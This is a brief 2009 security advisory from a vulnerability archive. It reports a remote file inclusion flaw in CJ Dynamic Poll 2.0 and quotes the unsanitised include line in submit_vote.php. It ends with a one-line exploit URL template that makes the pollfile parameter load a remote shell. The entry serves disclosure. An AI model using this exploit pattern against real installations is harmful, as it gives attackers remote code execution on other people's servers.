CJ Dynamic Poll 2.0 Remote File Inclusion Vulnerability

2009-07-12T00:00:00
ID SECURITYVULNS:DOC:22151
Type securityvulns
Reporter Securityvulns
Modified 2009-07-12T00:00:00

Description

    ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    +                                                                        +
    +        CJ Dynamic Poll 2.0 Remote File Inclusion Vulnerability     +
    +                                                                    +
    +                     Discovered by Cru3l.b0y                        +
    +                                                                    +
    +                      WwW.DeltaHacking.Net                          +
    +                                                                    +
    +                                                                    +
    +                                                                    +
    ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

AUTHOR : Cru3l.b0y APPLICATION : CJ Dynamic Poll VERSION : 2.0 DOWNLOAD : http://www.cj-design.com/dl/download/?file=19 VENDOR : http://www.cj-design.com

Vulnerable Code :

/submit_vote.php

7 include($pollfile);

[+]Exploit: http://[t4rg3t]/[p4th]/submit_vote.php?pollfile=shell